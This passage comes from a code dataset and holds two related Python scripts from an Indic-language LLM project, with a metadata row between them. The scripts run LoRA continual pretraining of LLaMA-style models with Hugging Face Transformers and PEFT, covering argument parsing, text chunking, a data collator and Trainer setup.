modules_to_save : Optional[str] = field(default=None)
debug_mode : Optional[bool] = field(default=False)
peft_path : Optional[str] = field(default=None)
logger = logging.getLogger(__name__)
def main():
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, MyTrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
# Sending telemetry. Tracking the example usage helps us better allocate resources to maintain them. The
# information sent is the one passed as arguments along with your Python/PyTorch versions.
send_example_telemetry("run_clm", model_args, data_args)
# Setup logging
logging.basicConfig(format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO, # if training_args.local_rank in [-1, 0] else logging.WARN,
handlers=[logging.StreamHandler(sys.stdout)],)
if training_args.should_log:
# The default of training_args.log_level is passive, so we set log level at info here to have that default.
transformers.utils.logging.set_verbosity_info()
log_level = training_args.get_process_log_level()
logger.setLevel(log_level)
datasets.utils.logging.set_verbosity(log_level)
transformers.utils.logging.set_verbosity(log_level)
transformers.utils.logging.enable_default_handler()
transformers.utils.logging.enable_explicit_format()
# transformers.tokenization_utils.logging.set_verbosity_warning()
# Log on each process the small summary:
logger.warning(
f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}"
+ f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}"
)
# Detecting last checkpoint.
last_checkpoint = None
if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir:
last_checkpoint = get_last_checkpoint(training_args.output_dir)
if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to overcome."
)
elif last_checkpoint is not None and training_args.resume_from_checkpoint is None:
logger.info(
f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change "
"the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
)
# Set seed before initializing model.
set_seed(training_args.seed)
config_kwargs = {
"cache_dir": model_args.cache_dir,
"revision": model_args.model_revision,
"use_auth_token": True if model_args.use_auth_token else None,
}
if model_args.config_name:
config = AutoConfig.from_pretrained(model_args.config_name, **config_kwargs)
elif model_args.model_name_or_path:
config = AutoConfig.from_pretrained(model_args.model_name_or_path, **config_kwargs)
else:
config = CONFIG_MAPPING[model_args.model_type]()
logger.warning("You are instantiating a new config instance from scratch.")
if model_args.config_overrides is not None:
logger.info(f"Overriding config: {model_args.config_overrides}")
config.update_from_string(model_args.config_overrides)
logger.info(f"New config: {config}")
tokenizer_kwargs = {
"cache_dir": model_args.cache_dir,
"use_fast": model_args.use_fast_tokenizer,
"revision": model_args.model_revision,
"use_auth_token": True if model_args.use_auth_token else None,
}
if model_args.tokenizer_name:
tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, **tokenizer_kwargs)
elif model_args.tokenizer_name_or_path:
tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name_or_path, **tokenizer_kwargs)
else:
raise ValueError(
"You are instantiating a new tokenizer from scratch. This is not supported by this script."
"You can do it from another script, save it, and load it from here, using --tokenizer_name."
)
# Preprocessing the datasets.
# First we tokenize all the texts.
# since this will be pickled to avoid _LazyModule error in Hasher force logger loading before tokenize_function
tok_logger = transformers.utils.logging.get_logger("transformers.tokenization_utils_base")
def tokenize_function(examples):
with CaptureLogger(tok_logger) as cl:
output = tokenizer(examples["text"])
# clm input could be much much longer than block_size
if "Token indices sequence length is longer than the" in cl.out:
tok_logger.warning(
"^^^^^^^^^^^^^^^^ Please ignore the warning above - this long input will be chunked into smaller bits"
" before being passed to the model."
)
return output
if data_args.block_size is None:
block_size = tokenizer.model_max_length
if block_size > 1024:
logger.warning(
"The chosen tokenizer supports a `model_max_length` that is longer than the default `block_size` value"
" of 1024. If you would like to use a longer `block_size` up to `tokenizer.model_max_length` you can"
" override this default with `--block_size xxx`."
)
block_size = 1024
else:
if data_args.block_size > tokenizer.model_max_length:
logger.warning(
f"The block_size passed ({data_args.block_size}) is larger than the maximum length for the model"
f"({tokenizer.model_max_length}). Using block_size={tokenizer.model_max_length}."
)
block_size = min(data_args.block_size, tokenizer.model_max_length)
# Main data processing function that will concatenate all texts from our dataset and generate chunks of block_size.
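    # For example, with block_size = 4, tokenized examples [[1, 2, 3], [4, 5, 6, 7, 8]]
    # are concatenated to [1, 2, 3, 4, 5, 6, 7, 8] and re-chunked into
    # [[1, 2, 3, 4], [5, 6, 7, 8]]; any remainder shorter than block_size is dropped.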
def group_texts(examples):
# Concatenate all texts.
concatenated_examples = {k: list(chain(*examples[k])) for k in examples.keys()}
total_length = len(concatenated_examples[list(examples.keys())[0]])
# We drop the small remainder, we could add padding if the model supported it instead of this drop, you can
# customize this part to your needs.
if total_length >= block_size:
total_length = (total_length // block_size) * block_size
# Split by chunks of max_len.
result = {
k: [t[i : i + block_size] for i in range(0, total_length, block_size)]
for k, t in concatenated_examples.items()
}
result["labels"] = result["input_ids"].copy()
return result
with training_args.main_process_first(desc="dataset map tokenization and grouping"):
lm_datasets = []
path = Path(data_args.dataset_dir)
files = [file.name for file in path.glob("*.txt")]
if training_args.debug_mode is True:
files = [files[0]]
for idx, file in enumerate(files):
data_file = os.path.join(path, file)
            filename = '.'.join(file.split(".")[:-1])
cache_path = os.path.join(data_args.data_cache_dir, filename)
os.makedirs(cache_path, exist_ok=True)
try:
processed_dataset = datasets.load_from_disk(cache_path, keep_in_memory=False)
                logger.info(f'training dataset {filename} has been loaded from disk')
except Exception:
cache_dir = os.path.join(data_args.data_cache_dir, filename+"_text")
os.makedirs(cache_dir, exist_ok=True)
raw_dataset = load_dataset("text", data_files=data_file, cache_dir=cache_dir, keep_in_memory=False)
logger.info(f"{file} has been loaded")
tokenized_dataset = raw_dataset.map(
tokenize_function,
batched=True,
num_proc=data_args.preprocessing_num_workers,
remove_columns="text",
load_from_cache_file=True,
keep_in_memory=False,
                    cache_file_names={k: os.path.join(cache_dir, 'tokenized.arrow') for k in raw_dataset},
desc="Running tokenizer on dataset",
)
grouped_datasets = tokenized_dataset.map(
group_texts,
batched=True,
num_proc=data_args.preprocessing_num_workers,
load_from_cache_file=True,
keep_in_memory=False,
                    cache_file_names={k: os.path.join(cache_dir, 'grouped.arrow') for k in tokenized_dataset},
desc=f"Grouping texts in chunks of {block_size}",
)
processed_dataset = grouped_datasets
processed_dataset.save_to_disk(cache_path)
if idx == 0:
lm_datasets = processed_dataset['train']
else:
assert lm_datasets.features.type == processed_dataset["train"].features.type
lm_datasets = concatenate_datasets([lm_datasets, processed_dataset["train"]])
lm_datasets = lm_datasets.train_test_split(test_size = data_args.validation_split_percentage)
if training_args.do_train:
train_dataset = lm_datasets['train']
if data_args.max_train_samples is not None:
max_train_samples = min(len(train_dataset), data_args.max_train_samples)
train_dataset = train_dataset.select(range(max_train_samples))
logger.info(f"Num train_samples {len(train_dataset)}")
logger.info("training example:")
logger.info(tokenizer.decode(train_dataset[0]['input_ids']))
if training_args.do_eval:
eval_dataset = lm_datasets["test"]
if data_args.max_eval_samples is not None:
max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples)
eval_dataset = eval_dataset.select(range(max_eval_samples))
logger.info(f"Num eval_samples {len(eval_dataset)}")
logger.info("training example:")
logger.info(tokenizer.decode(eval_dataset[0]['input_ids']))
if model_args.model_name_or_path:
torch_dtype = (
model_args.torch_dtype
if model_args.torch_dtype in ["auto", None]
else getattr(torch, model_args.torch_dtype)
)
model = AutoModelForCausalLM.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
torch_dtype=torch_dtype,
low_cpu_mem_usage=True
)
else:
model = AutoModelForCausalLM.from_config(config)
n_params = sum({p.data_ptr(): p.numel() for p in model.parameters()}.values())
logger.info(f"Training new model from scratch - Total size={n_params/2**20:.2f}M params")
# model_vocab_size = model.get_output_embeddings().weight.size(0)
# if not (
# (model_vocab_size==32000 and len(tokenizer)==49953) or \
# (model_vocab_size==32000 and len(tokenizer)==32000) or \
# (model_vocab_size==49953 and len(tokenizer)==49953) or \
# (model_vocab_size==49954 and len(tokenizer)==49954)
# ):
# raise ValueError(
# f"The combination of base model (size: {model_vocab_size}) and tokenizer (size: {len(tokenizer)}) is not a valid configuration. Please check our project wiki for further information. \n"
# "Valid configurations (base model / tokenizer):\n"
# "- Continue pre-training original LLaMA: 32000 / 32000 \n"
# "- Pre-training Chinese LLaMA based on original LLaMA: 32000 / 49953 \n"
# "- Continue pre-training Chinese LLaMA: 49953 / 49953 \n"
# "- Continue pre-training Chinese Alpaca: 49954 / 49954 \n")
# model.resize_token_embeddings(len(tokenizer))
if training_args.peft_path is not None:
logger.info("Peft from pre-trained model")
model = PeftModel.from_pretrained(model, training_args.peft_path)
else:
logger.info("Init new peft model")
target_modules = training_args.trainable.split(',')
modules_to_save = training_args.modules_to_save
if modules_to_save is not None:
modules_to_save = modules_to_save.split(',')
lora_rank = training_args.lora_rank
lora_dropout = training_args.lora_dropout
lora_alpha = training_args.lora_alpha
logger.info(f"target_modules: {target_modules}")
logger.info(f"lora_rank: {lora_rank}")
peft_config = LoraConfig(
task_type=TaskType.CAUSAL_LM,
target_modules=target_modules,
inference_mode=False,
r=lora_rank, lora_alpha=lora_alpha,
lora_dropout=lora_dropout,
modules_to_save=modules_to_save)
model = get_peft_model(model, peft_config)
model.print_trainable_parameters()
old_state_dict = model.state_dict
model.state_dict = (
lambda self, *_, **__: get_peft_model_state_dict(self, old_state_dict())
).__get__(model, type(model))
# Initialize our Trainer
trainer = Trainer(
model=model,
args=training_args,
train_dataset=train_dataset if training_args.do_train else None,
eval_dataset=eval_dataset if training_args.do_eval else None,
tokenizer=tokenizer,
data_collator=fault_tolerance_data_collator,
compute_metrics=compute_metrics if training_args.do_eval and not is_torch_tpu_available() else None,
preprocess_logits_for_metrics=preprocess_logits_for_metrics
if training_args.do_eval and not is_torch_tpu_available()
else None,
)
trainer.add_callback(SavePeftModelCallback)
# Training
if training_args.do_train:
checkpoint = None
if training_args.resume_from_checkpoint is not None:
checkpoint = training_args.resume_from_checkpoint
elif last_checkpoint is not None:
checkpoint = last_checkpoint
train_result = trainer.train(resume_from_checkpoint=checkpoint)
metrics = train_result.metrics
max_train_samples = (
data_args.max_train_samples if data_args.max_train_samples is not None else len(train_dataset)
)
metrics["train_samples"] = min(max_train_samples, len(train_dataset))
trainer.log_metrics("train", metrics)
trainer.save_metrics("train", metrics)
trainer.save_state()
# Evaluation
if training_args.do_eval:
logger.info("*** Evaluate ***")
metrics = trainer.evaluate()
max_eval_samples = data_args.max_eval_samples if data_args.max_eval_samples is not None else len(eval_dataset)
metrics["eval_samples"] = min(max_eval_samples, len(eval_dataset))
try:
perplexity = math.exp(metrics["eval_loss"])
except OverflowError:
perplexity = float("inf")
metrics["perplexity"] = perplexity
trainer.log_metrics("eval", metrics)
trainer.save_metrics("eval", metrics)
if __name__ == "__main__":
main() | 28,345 | Python | .py | 574 | 40.578397 | 200 | 0.647091 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,529 | pretrain.py | adithya-s-k_Indic-llm/indic_llm/continual_pretrain/pretrain.py | #!/usr/bin/env python
# coding=utf-8
# Copyright 2020 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning the library models for causal language modeling (GPT, GPT-2, CTRL, ...) on a text file or a dataset.
Here is the full list of checkpoints on the hub that can be fine-tuned by this script:
https://huggingface.co/models?filter=text-generation
"""
# You can also adapt this script on your own causal language modeling task. Pointers for this are left as comments.
import logging
import numpy as np
import math
import os
import sys
from dataclasses import dataclass, field
from itertools import chain
from typing import Optional, List, Dict, Any, Mapping
from pathlib import Path
import datasets
import torch
from datasets import load_dataset, concatenate_datasets
import transformers
from transformers import (
CONFIG_MAPPING,
MODEL_FOR_CAUSAL_LM_MAPPING,
AutoConfig,
AutoModelForCausalLM,
LlamaForCausalLM,
LlamaTokenizer,
AutoTokenizer,
HfArgumentParser,
Trainer,
TrainingArguments,
is_torch_tpu_available,
set_seed,
)
from transformers.testing_utils import CaptureLogger
from transformers.trainer_utils import get_last_checkpoint
from transformers.utils import send_example_telemetry
from transformers.utils.versions import require_version
from sklearn.metrics import accuracy_score
from peft import LoraConfig, TaskType, get_peft_model, PeftModel, get_peft_model_state_dict
from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR
class SavePeftModelCallback(transformers.TrainerCallback):
def save_model(self, args, state, kwargs):
if state.best_model_checkpoint is not None:
checkpoint_folder = os.path.join(state.best_model_checkpoint, "pt_lora_model")
else:
checkpoint_folder = os.path.join(args.output_dir, f"{PREFIX_CHECKPOINT_DIR}-{state.global_step}")
peft_model_path = os.path.join(checkpoint_folder, "pt_lora_model")
kwargs["model"].save_pretrained(peft_model_path)
kwargs["tokenizer"].save_pretrained(peft_model_path)
def on_save(self, args, state, control, **kwargs):
self.save_model(args, state, kwargs)
return control
def on_train_end(self, args, state, control, **kwargs):
peft_model_path = os.path.join(args.output_dir, "pt_lora_model")
kwargs["model"].save_pretrained(peft_model_path)
kwargs["tokenizer"].save_pretrained(peft_model_path)
def accuracy(predictions, references, normalize=True, sample_weight=None):
return {
"accuracy": float(
accuracy_score(references, predictions, normalize=normalize, sample_weight=sample_weight)
)
}
def compute_metrics(eval_preds):
preds, labels = eval_preds
# preds have the same shape as the labels, after the argmax(-1) has been calculated
# by preprocess_logits_for_metrics but we need to shift the labels
labels = labels[:, 1:].reshape(-1)
preds = preds[:, :-1].reshape(-1)
return accuracy(predictions=preds, references=labels)
def preprocess_logits_for_metrics(logits, labels):
if isinstance(logits, tuple):
# Depending on the model and config, logits may contain extra tensors,
# like past_key_values, but logits always come first
logits = logits[0]
return logits.argmax(dim=-1)
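def _shifted_accuracy_example():
    """Hypothetical sketch (never called by the training flow): shows why
    compute_metrics drops the last prediction and the first label. For a causal
    LM, the logit at position t predicts the token at position t + 1."""
    labels = np.array([[101, 7, 8, 9]])  # e.g. [BOS, a, b, c]
    preds = np.array([[7, 8, 9, 102]])   # per-position argmax predictions
    refs = labels[:, 1:].reshape(-1)     # (a, b, c)
    hyps = preds[:, :-1].reshape(-1)     # (a, b, c)
    return accuracy(predictions=hyps, references=refs)  # {'accuracy': 1.0}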
def fault_tolerance_data_collator(features: List) -> Dict[str, Any]:
if not isinstance(features[0], Mapping):
features = [vars(f) for f in features]
first = features[0]
batch = {}
# Special handling for labels.
# Ensure that tensor is created with the correct type
# (it should be automatically the case, but let's make sure of it.)
if "label" in first and first["label"] is not None:
label = first["label"].item() if isinstance(first["label"], torch.Tensor) else first["label"]
dtype = torch.long if isinstance(label, int) else torch.float
batch["labels"] = torch.tensor([f["label"] for f in features], dtype=dtype)
elif "label_ids" in first and first["label_ids"] is not None:
if isinstance(first["label_ids"], torch.Tensor):
batch["labels"] = torch.stack([f["label_ids"] for f in features])
else:
dtype = torch.long if isinstance(first["label_ids"][0], int) else torch.float
batch["labels"] = torch.tensor([f["label_ids"] for f in features], dtype=dtype)
# Handling of all other possible keys.
# Again, we will use the first element to figure out which key/values are not None for this model.
try:
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, torch.Tensor):
batch[k] = torch.stack([f[k] for f in features])
elif isinstance(v, np.ndarray):
batch[k] = torch.tensor(np.stack([f[k] for f in features]))
else:
batch[k] = torch.tensor([f[k] for f in features])
    except ValueError:  # quick fix: simply repeat the first example across the batch
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, torch.Tensor):
batch[k] = torch.stack([features[0][k]] * len(features))
elif isinstance(v, np.ndarray):
batch[k] = torch.tensor(np.stack([features[0][k]] * len(features)))
else:
batch[k] = torch.tensor([features[0][k]] * len(features))
    return batch
MODEL_CONFIG_CLASSES = list(MODEL_FOR_CAUSAL_LM_MAPPING.keys())
MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES)
@dataclass
class ModelArguments:
    """
    Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch.
    """
    model_name_or_path: Optional[str] = field(
        default=None,
        metadata={
            "help": (
                "The model checkpoint for weights initialization. Don't set if you want to train a model from scratch."
            )
        },
    )
    tokenizer_name_or_path: Optional[str] = field(
        default=None,
        metadata={
            "help": (
                "The tokenizer for weights initialization. Don't set if you want to train a model from scratch."
            )
        },
    )
    model_type: Optional[str] = field(
        default=None,
        metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)},
    )
    config_overrides: Optional[str] = field(
        default=None,
        metadata={
            "help": (
                "Override some existing default config settings when a model is trained from scratch. Example: "
                "n_embd=10,resid_pdrop=0.2,scale_attn_weights=false,summary_type=cls_index"
            )
        },
    )
    config_name: Optional[str] = field(
        default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
    )
    tokenizer_name: Optional[str] = field(
        default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
    )
    cache_dir: Optional[str] = field(
        default=None,
        metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
    )
    use_fast_tokenizer: bool = field(
        default=True,
        metadata={"help": "Whether to use one of the fast tokenizers (backed by the tokenizers library) or not."},
    )
    model_revision: str = field(
        default="main",
        metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
    )
    use_auth_token: bool = field(
        default=False,
        metadata={
            "help": (
                "Will use the token generated when running `huggingface-cli login` (necessary to use this script "
                "with private models)."
            )
        },
    )
    torch_dtype: Optional[str] = field(
        default=None,
        metadata={
            "help": (
                "Override the default `torch.dtype` and load the model under this dtype. If `auto` is passed, the "
                "dtype will be automatically derived from the model's weights."
            ),
            "choices": ["auto", "bfloat16", "float16", "float32"],
        },
    )
    def __post_init__(self):
        if self.config_overrides is not None and (self.config_name is not None or self.model_name_or_path is not None):
            raise ValueError(
                "--config_overrides can't be used in combination with --config_name or --model_name_or_path"
            )
@dataclass
class DataTrainingArguments:
    """
    Arguments pertaining to what data we are going to input our model for training and eval.
    """
    dataset_dir: Optional[str] = field(
        default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."}
    )
    dataset_config_name: Optional[str] = field(
        default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."}
    )
    train_file: Optional[str] = field(default=None, metadata={"help": "The input training data file (a text file)."})
    validation_file: Optional[str] = field(
        default=None,
        metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."},
    )
    max_train_samples: Optional[int] = field(
        default=None,
        metadata={
            "help": (
                "For debugging purposes or quicker training, truncate the number of training examples to this "
                "value if set."
            )
        },
    )
    max_eval_samples: Optional[int] = field(
        default=None,
        metadata={
            "help": (
                "For debugging purposes or quicker training, truncate the number of evaluation examples to this "
                "value if set."
            )
        },
    )
    streaming: bool = field(default=False, metadata={"help": "Enable streaming mode"})
    block_size: Optional[int] = field(
        default=None,
        metadata={
            "help": (
                "Optional input sequence length after tokenization. "
                "The training dataset will be truncated in block of this size for training. "
                "Default to the model max input length for single sentence inputs (take into account special tokens)."
            )
        },
    )
    overwrite_cache: bool = field(
        default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
    )
    validation_split_percentage: Optional[float] = field(
        default=0.05,
        metadata={
            "help": "The percentage of the train set used as validation set in case there's no validation split"
        },
    )
    preprocessing_num_workers: Optional[int] = field(
        default=None,
        metadata={"help": "The number of processes to use for the preprocessing."},
    )
    keep_linebreaks: bool = field(
        default=True, metadata={"help": "Whether to keep line breaks when using TXT files or not."}
    )
    data_cache_dir: Optional[str] = field(default="./", metadata={"help": "The datasets processed stored"})
    def __post_init__(self):
        if self.streaming:
            require_version("datasets>=2.0.0", "The streaming feature requires `datasets>=2.0.0`")
@dataclass
class MyTrainingArguments(TrainingArguments):
    trainable: Optional[str] = field(default="q_proj,v_proj")
    lora_rank: Optional[int] = field(default=8)
    lora_dropout: Optional[float] = field(default=0.1)
    lora_alpha: Optional[float] = field(default=32.)
    modules_to_save: Optional[str] = field(default=None)
    debug_mode: Optional[bool] = field(default=False)
    peft_path: Optional[str] = field(default=None)
logger = logging.getLogger(__name__)
def main():
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, MyTrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
# Sending telemetry. Tracking the example usage helps us better allocate resources to maintain them. The
# information sent is the one passed as arguments along with your Python/PyTorch versions.
send_example_telemetry("run_clm", model_args, data_args)
# Setup logging
logging.basicConfig(format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO, # if training_args.local_rank in [-1, 0] else logging.WARN,
handlers=[logging.StreamHandler(sys.stdout)],)
if training_args.should_log:
# The default of training_args.log_level is passive, so we set log level at info here to have that default.
transformers.utils.logging.set_verbosity_info()
log_level = training_args.get_process_log_level()
logger.setLevel(log_level)
datasets.utils.logging.set_verbosity(log_level)
transformers.utils.logging.set_verbosity(log_level)
transformers.utils.logging.enable_default_handler()
transformers.utils.logging.enable_explicit_format()
# transformers.tokenization_utils.logging.set_verbosity_warning()
# Log on each process the small summary:
    logger.warning(
        f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}, "
        + f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}"
    )
# Detecting last checkpoint.
last_checkpoint = None
if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir:
last_checkpoint = get_last_checkpoint(training_args.output_dir)
if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to overcome."
)
elif last_checkpoint is not None and training_args.resume_from_checkpoint is None:
logger.info(
f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change "
"the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
)
# Set seed before initializing model.
set_seed(training_args.seed)
config_kwargs = {
"cache_dir": model_args.cache_dir,
"revision": model_args.model_revision,
"use_auth_token": True if model_args.use_auth_token else None,
}
if model_args.config_name:
config = AutoConfig.from_pretrained(model_args.config_name, **config_kwargs)
elif model_args.model_name_or_path:
config = AutoConfig.from_pretrained(model_args.model_name_or_path, **config_kwargs)
else:
config = CONFIG_MAPPING[model_args.model_type]()
logger.warning("You are instantiating a new config instance from scratch.")
if model_args.config_overrides is not None:
logger.info(f"Overriding config: {model_args.config_overrides}")
config.update_from_string(model_args.config_overrides)
logger.info(f"New config: {config}")
tokenizer_kwargs = {
"cache_dir": model_args.cache_dir,
"use_fast": model_args.use_fast_tokenizer,
"revision": model_args.model_revision,
"use_auth_token": True if model_args.use_auth_token else None,
}
if model_args.tokenizer_name:
tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, **tokenizer_kwargs)
elif model_args.tokenizer_name_or_path:
tokenizer = LlamaTokenizer.from_pretrained(model_args.tokenizer_name_or_path, **tokenizer_kwargs)
else:
raise ValueError(
"You are instantiating a new tokenizer from scratch. This is not supported by this script."
"You can do it from another script, save it, and load it from here, using --tokenizer_name."
)
# Preprocessing the datasets.
# First we tokenize all the texts.
    # force the logger to load before tokenize_function, since tokenize_function will be
    # pickled and a lazily loaded logger would trigger a _LazyModule error in Hasher
tok_logger = transformers.utils.logging.get_logger("transformers.tokenization_utils_base")
def tokenize_function(examples):
with CaptureLogger(tok_logger) as cl:
output = tokenizer(examples["text"])
# clm input could be much much longer than block_size
if "Token indices sequence length is longer than the" in cl.out:
tok_logger.warning(
"^^^^^^^^^^^^^^^^ Please ignore the warning above - this long input will be chunked into smaller bits"
" before being passed to the model."
)
return output
if data_args.block_size is None:
block_size = tokenizer.model_max_length
if block_size > 1024:
logger.warning(
"The chosen tokenizer supports a `model_max_length` that is longer than the default `block_size` value"
" of 1024. If you would like to use a longer `block_size` up to `tokenizer.model_max_length` you can"
" override this default with `--block_size xxx`."
)
block_size = 1024
else:
if data_args.block_size > tokenizer.model_max_length:
logger.warning(
f"The block_size passed ({data_args.block_size}) is larger than the maximum length for the model"
f"({tokenizer.model_max_length}). Using block_size={tokenizer.model_max_length}."
)
block_size = min(data_args.block_size, tokenizer.model_max_length)
# Main data processing function that will concatenate all texts from our dataset and generate chunks of block_size.
def group_texts(examples):
# Concatenate all texts.
concatenated_examples = {k: list(chain(*examples[k])) for k in examples.keys()}
total_length = len(concatenated_examples[list(examples.keys())[0]])
# We drop the small remainder, we could add padding if the model supported it instead of this drop, you can
# customize this part to your needs.
if total_length >= block_size:
total_length = (total_length // block_size) * block_size
# Split by chunks of max_len.
result = {
k: [t[i : i + block_size] for i in range(0, total_length, block_size)]
for k, t in concatenated_examples.items()
}
result["labels"] = result["input_ids"].copy()
return result
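    # Toy illustration (values hypothetical): with block_size = 4, tokenized rows
    # [[1, 2, 3], [4, 5, 6, 7, 8, 9]] concatenate to [1..9]; the 1-token remainder
    # is dropped, yielding input_ids [[1, 2, 3, 4], [5, 6, 7, 8]] with labels equal
    # to input_ids (the causal shift happens later, in the model and the metrics).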
with training_args.main_process_first(desc="dataset map tokenization and grouping"):
lm_datasets = []
path = Path(data_args.dataset_dir)
files = [file.name for file in path.glob("*.txt")]
if training_args.debug_mode is True:
files = [files[0]]
for idx, file in enumerate(files):
data_file = os.path.join(path, file)
filename = ''.join(file.split(".")[:-1])
cache_path = os.path.join(data_args.data_cache_dir, filename)
os.makedirs(cache_path, exist_ok=True)
try:
processed_dataset = datasets.load_from_disk(cache_path, keep_in_memory=False)
logger.info(f'training datasets-{filename} has been loaded from disk')
except Exception:
cache_dir = os.path.join(data_args.data_cache_dir, filename+"_text")
os.makedirs(cache_dir, exist_ok=True)
raw_dataset = load_dataset("text", data_files=data_file, cache_dir=cache_dir, keep_in_memory=False)
logger.info(f"{file} has been loaded")
tokenized_dataset = raw_dataset.map(
tokenize_function,
batched=True,
num_proc=data_args.preprocessing_num_workers,
remove_columns="text",
load_from_cache_file=True,
keep_in_memory=False,
cache_file_names = {k: os.path.join(cache_dir, 'tokenized.arrow') for k in raw_dataset},
desc="Running tokenizer on dataset",
)
grouped_datasets = tokenized_dataset.map(
group_texts,
batched=True,
num_proc=data_args.preprocessing_num_workers,
load_from_cache_file=True,
keep_in_memory=False,
cache_file_names = {k: os.path.join(cache_dir, 'grouped.arrow') for k in tokenized_dataset},
desc=f"Grouping texts in chunks of {block_size}",
)
processed_dataset = grouped_datasets
processed_dataset.save_to_disk(cache_path)
if idx == 0:
lm_datasets = processed_dataset['train']
else:
assert lm_datasets.features.type == processed_dataset["train"].features.type
lm_datasets = concatenate_datasets([lm_datasets, processed_dataset["train"]])
lm_datasets = lm_datasets.train_test_split(test_size = data_args.validation_split_percentage)
if training_args.do_train:
train_dataset = lm_datasets['train']
if data_args.max_train_samples is not None:
max_train_samples = min(len(train_dataset), data_args.max_train_samples)
train_dataset = train_dataset.select(range(max_train_samples))
logger.info(f"Num train_samples {len(train_dataset)}")
logger.info("training example:")
logger.info(tokenizer.decode(train_dataset[0]['input_ids']))
if training_args.do_eval:
eval_dataset = lm_datasets["test"]
if data_args.max_eval_samples is not None:
max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples)
eval_dataset = eval_dataset.select(range(max_eval_samples))
logger.info(f"Num eval_samples {len(eval_dataset)}")
logger.info("training example:")
logger.info(tokenizer.decode(eval_dataset[0]['input_ids']))
if model_args.model_name_or_path:
torch_dtype = (
model_args.torch_dtype
if model_args.torch_dtype in ["auto", None]
else getattr(torch, model_args.torch_dtype)
)
model = LlamaForCausalLM.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
torch_dtype=torch_dtype,
low_cpu_mem_usage=True
)
else:
model = AutoModelForCausalLM.from_config(config)
n_params = sum({p.data_ptr(): p.numel() for p in model.parameters()}.values())
logger.info(f"Training new model from scratch - Total size={n_params/2**20:.2f}M params")
model.resize_token_embeddings(len(tokenizer))
if training_args.peft_path is not None:
logger.info("Peft from pre-trained model")
model = PeftModel.from_pretrained(model, training_args.peft_path)
else:
logger.info("Init new peft model")
target_modules = training_args.trainable.split(',')
modules_to_save = training_args.modules_to_save
if modules_to_save is not None:
modules_to_save = modules_to_save.split(',')
lora_rank = training_args.lora_rank
lora_dropout = training_args.lora_dropout
lora_alpha = training_args.lora_alpha
logger.info(f"target_modules: {target_modules}")
logger.info(f"lora_rank: {lora_rank}")
peft_config = LoraConfig(
task_type=TaskType.CAUSAL_LM,
target_modules=target_modules,
inference_mode=False,
r=lora_rank, lora_alpha=lora_alpha,
lora_dropout=lora_dropout,
modules_to_save=modules_to_save)
